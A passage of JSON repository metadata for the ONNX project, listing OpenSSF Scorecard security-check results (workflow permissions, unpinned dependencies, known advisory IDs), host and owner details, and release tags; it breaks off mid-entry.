\"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: Dependabot: .github/dependabot.yml:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":0,"reason":"dangerous workflow patterns detected","details":["Warn: untrusted code checkout '${{ github.event.pull_request.head.sha }}': .github/workflows/auto_update_doc.yml:25"],"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/auto_update_doc.yml:22","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:35","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:36","Info: jobLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:26","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:214","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:266","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:304","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:162","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/auto_update_doc.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/check_urls.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/clang_tidy_review.yml:16","Warn: topLevel 'checks' permission set to 'write': .github/workflows/clang_tidy_review_post.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:62","Info: topLevel 'contents' permission set to 'read': .github/workflows/dco_merge_group.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/pages.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/pixi_build.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/preview_source_dist_test.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_linux.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_mac.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_sdist.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_aarch64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_x86_64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/reuse.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/stale.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/weekly_modelzoo.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/win_no_exception_ci.yml:14"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Info: Possibly incomplete results: error parsing shell code: statements must be separated by \u0026, ; or a newline: .github/workflows/main.yml:131","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/copilot-setup-steps.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/copilot-setup-steps.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr_checks.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pr_checks.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:78","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:39","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:40","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:73","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:80","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:85","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:86","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:151","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:161","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:171","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:189","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:195","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:249","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:266","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:37","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:38","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/pr_checks.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:49","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:50","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:57","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:82","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:112","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:113","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:119","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:120","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:126","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:46","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:55","Info:  59 out of  61 GitHub-owned GitHubAction dependencies pinned","Info:  22 out of  27 third-party GitHubAction dependencies pinned","Info:   0 out of  49 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/create_release.yml:152"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"74 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-6rq9-53c3-f7vj","Warn: Project is vulnerable to: PYSEC-2023-38 / GHSA-ffxj-547x-5j7c","Warn: Project is vulnerable to: PYSEC-2025-10 / GHSA-h36j-8vv3-cj52","Warn: Project is vulnerable to: PYSEC-2024-223 / GHSA-h8wv-9h96-m4hr","Warn: Project is vulnerable to: PYSEC-2024-222 / GHSA-whh8-fjgc-qp73","Warn: Project is vulnerable to: GHSA-3c5c-7235-994j","Warn: Project is vulnerable to: GHSA-3f63-hfp8-52jq","Warn: Project is vulnerable to: PYSEC-2021-41 / GHSA-3wvg-mj6g-m9cv","Warn: Project is vulnerable to: PYSEC-2020-77 / GHSA-3xv8-3j54-hgrp","Warn: Project is vulnerable to: PYSEC-2020-80 / GHSA-43fq-w8qq-v88h","Warn: Project is vulnerable to: GHSA-44wm-f244-xhp3","Warn: Project is vulnerable to: GHSA-4fx9-vc88-q2xc","Warn: Project is vulnerable to: PYSEC-2021-35 / GHSA-57h3-9rgr-c24m","Warn: Project is vulnerable to: PYSEC-2020-172 / GHSA-5gm3-px64-rw72","Warn: Project is vulnerable to: PYSEC-2021-331 / GHSA-7534-mm45-c74v","Warn: Project is vulnerable to: PYSEC-2021-92 / GHSA-7r7m-5h27-29hp","Warn: Project is vulnerable to: PYSEC-2020-78 / GHSA-8843-m7mw-mxqm","Warn: Project is vulnerable to: PYSEC-2023-227 / GHSA-8ghj-p4vj-mr35","Warn: Project is vulnerable to: PYSEC-2014-87 / GHSA-8m9x-pxwq-j236","Warn: Project is vulnerable to: PYSEC-2022-10 / GHSA-8vj2-vxx3-667w","Warn: Project is vulnerable to: PYSEC-2021-36 / GHSA-8xjq-8fcg-g5hw","Warn: Project is vulnerable to: PYSEC-2016-6 / GHSA-8xjv-v9xq-m5h9","Warn: Project is vulnerable to: PYSEC-2021-42 / GHSA-95q3-8gr9-gm8w","Warn: Project is vulnerable to: PYSEC-2022-168 / GHSA-9j59-75qj-795w","Warn: Project is vulnerable to: PYSEC-2014-10 / GHSA-cfmr-38g9-f2h7","Warn: Project is vulnerable to: PYSEC-2020-76 / GHSA-cqhg-xjhh-p8hf","Warn: Project is vulnerable to: PYSEC-2021-40 / GHSA-f4w8-cv6p-x6r5","Warn: Project is vulnerable to: PYSEC-2021-69 / GHSA-f5g8-5qq7-938w","Warn: Project is vulnerable to: PYSEC-2021-139 / GHSA-g6rj-rv7j-xwp4","Warn: Project is vulnerable to: PYSEC-2015-16 / GHSA-h5rf-vgqx-wjv2","Warn: Project is vulnerable to: PYSEC-2016-5 / GHSA-hggx-3h72-49ww","Warn: Project is vulnerable to: PYSEC-2020-84 / GHSA-hj69-c76v-86wr","Warn: Project is vulnerable to: PYSEC-2016-7 / GHSA-hvr8-466p-75rh","Warn: Project is vulnerable to: PYSEC-2015-15 / GHSA-j6f7-g425-4gmx","Warn: Project is vulnerable to: GHSA-j7hp-h8jx-5ppr","Warn: Project is vulnerable to: PYSEC-2019-110 / GHSA-j7mj-748x-7p78","Warn: Project is vulnerable to: GHSA-jgpv-4h4c-xhw3","Warn: Project is vulnerable to: PYSEC-2022-42979 / GHSA-m2vv-5vj5-2hm7","Warn: Project is vulnerable to: PYSEC-2021-37 / GHSA-mvg9-xffr-p774","Warn: Project is vulnerable to: PYSEC-2020-83 / GHSA-p49h-hjvm-jg3h","Warn: Project is vulnerable to: PYSEC-2022-8 / GHSA-pw3c-h7wp-cvhx","Warn: Project is vulnerable to: PYSEC-2021-93 / GHSA-q5hq-fp76-qmrc","Warn: Project is vulnerable to: PYSEC-2020-82 / GHSA-r7rm-8j6h-r933","Warn: Project is vulnerable to: PYSEC-2014-23 / GHSA-r854-96gq-rfg3","Warn: Project is vulnerable to: PYSEC-2016-8 / GHSA-rwr3-c2q8-gm56","Warn: Project is vulnerable to: PYSEC-2020-81 / GHSA-vcqg-3p29-xw73","Warn: Project is vulnerable to: PYSEC-2020-79 / GHSA-vj42-xq3r-hr3r","Warn: Project is vulnerable to: PYSEC-2021-70 / GHSA-vqcj-wrf2-7v73","Warn: Project is vulnerable to: PYSEC-2016-9 / GHSA-w4vg-rf63-f3j3","Warn: Project is vulnerable to: PYSEC-2014-22 / GHSA-x895-2wrm-hvp7","Warn: Project is vulnerable to: PYSEC-2022-9 / GHSA-xrcv-f9gm-v42c","Warn: Project is vulnerable to: PYSEC-2021-137","Warn: Project is vulnerable to: PYSEC-2021-138","Warn: Project is vulnerable to: PYSEC-2021-317","Warn: Project is vulnerable to: PYSEC-2021-38","Warn: Project is vulnerable to: PYSEC-2021-39","Warn: Project is vulnerable to: PYSEC-2021-94","Warn: Project is vulnerable to: PYSEC-2023-175","Warn: Project is vulnerable to: PYSEC-2018-34 / GHSA-2fc2-6r4j-p65h","Warn: Project is vulnerable to: PYSEC-2021-856 / GHSA-5545-2q6w-2gh6","Warn: Project is vulnerable to: PYSEC-2019-108 / GHSA-9fq2-x9r6-wfmf","Warn: Project is vulnerable to: PYSEC-2018-33 / GHSA-cw6w-4rcx-xphc","Warn: Project is vulnerable to: PYSEC-2021-857 / GHSA-f7c7-j99h-c22f","Warn: Project is vulnerable to: GHSA-fpfv-jqm9-f5jm","Warn: Project is vulnerable to: PYSEC-2017-1 / GHSA-frgw-fgh6-9g52","Warn: Project is vulnerable to: PYSEC-2022-48 / GHSA-77rm-9x9h-xj3g","Warn: Project is vulnerable to: GHSA-8gq9-2x98-w8hf","Warn: Project is vulnerable to: GHSA-8qvm-5x2c-j2w7","Warn: Project is vulnerable to: PYSEC-2017-65 / GHSA-jwvw-v7c5-m82h","Warn: Project is vulnerable to: PYSEC-2013-22 / GHSA-27x4-j476-jp5f","Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-cx63-2mw6-8hw5","Warn: Project is vulnerable to: PYSEC-2022-43012 / GHSA-r9hx-vwmv-q579","Warn: Project is vulnerable to: PYSEC-2022-43017 / GHSA-qwmp-2cf2-g9g6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 30 contributing companies or organizations","details":["Info: found contributions from: EasyRPG, PeachPy, ScottyLabs, ZhaobangChina, amd, anthropics, barnowl, chainer, couler-proj, cpprefjp, cryfs, cupy, dotnet, facebook, ghc, gsoc-cn, intelligent-machine-learning, k9mail, microsoft, microsoft research, mrbgems, nanyang technological university, nvidia, onnx, open-keychain, pytorch, sipb, skywork ai, sql-machine-learning, uc berkeley"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-17T07:32:27.176Z","repository_id":24890799,"created_at":"2025-08-17T07:32:27.176Z","updated_at":"2025-08-17T07:32:27.176Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281322869,"owners_count":26481547,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-27T02:00:05.855Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"tags":[{"name":"v1.19.1","sha":"b751946c3d59a3c8358abcc0569b59e6ddb08cdd","kind":"commit","published_at":"2025-10-08T03:53:00.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"57b9c6a4f6eebb09ae1b34cfb632078518f72832","kind":"commit","published_at":"2025-08-26T21:37:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0/manifests"},{"name":"v1.18.0","sha":"e709452ef2bbc1d113faf678c24e6d3467696e83","kind":"commit","published_at":"2025-05-08T17:33:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.18.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0/manifests"},{"name":"v1.17.0","sha":"b8baa8446686496da4cc8fda09f2b6fe65c2a02c","kind":"commit","published_at":"2024-09-30T22:42:05.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.17.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0/manifests"},{"name":"v1.16.2","sha":"3bf92c03a9f27eba3bda1e5b9e63ea20ec213557","kind":"commit","published_at":"2024-07-31T13:15:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"595228d99e3977ac27cb79d5963adda262af99ad","kind":"commit","published_at":"2024-05-23T16:33:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"990217f043af7222348ca8f0301e17fa7b841781","kind":"commit","published_at":"2024-03-25T13:55:50.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0/manifests"},{"name":"v1.15.0","sha":"b86cc54efce19530fb953e4b21f57e6b3888534c","kind":"commit","published_at":"2023-10-25T22:10:41.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.15.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0/manifests"},{"name":"v1.14.1","sha":"1014f41f17ecc778d63e760a994579d96ba471ff","kind":"commit","published_at":"2023-08-24T22:20:34.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"a0d77f18516d2da7468a96b0de3b737266f23176","kind":"commit","published_at":"2023-05-04T00:14:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0/manifests"},{"name":"v1.13.1","sha":"ad834eb73ee0cd9b6fa9ea892caeed5fa17d7dc0","kind":"commit","published_at":"2023-02-21T22:21:30.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"1ba785612a79fe749aa1e478336e534743372639","kind":"commit","published_at":"2022-12-09T18:56:29.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0/manifests"},{"name":"v1.12.0","sha":"f7ee1ac60d06abe8e26c9b6bbe1e3db5286b614b","kind":"commit","published_at":"2022-06-17T23:32:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.12.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"96046b8ccfb8e6fa82f6b2b34b3d56add2e8849c","kind":"commit","published_at":"2022-02-16T23:56:21.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.11.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0/manifests"},{"name":"v1.10.2","sha":"da889e6b95750350726d149bf447bf0cd1245964","kind":"commit","published_at":"2021-10-25T15:52:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1